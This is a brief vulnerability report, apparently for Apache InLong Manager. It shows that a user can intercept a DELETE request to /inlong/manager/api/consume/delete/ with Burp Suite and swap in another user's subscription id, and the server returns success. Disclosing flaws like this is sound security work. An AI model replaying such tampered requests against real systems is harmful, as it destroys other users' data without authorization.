1 user1 create subscription1
2 user2 create subscription2
3 user2 delete subscription2
4 user2 use burpsuite hiajck the request
5 the request URL can be DELETE /inlong/manager/api/consume/delete/2
6 change the request :DELETE /inlong/manager/api/consume/delete/1
1 is the id of subscription1. user2 is not the owner of subscription2.
7 result:
{“success”:true,“errMsg”:null,“data”:true}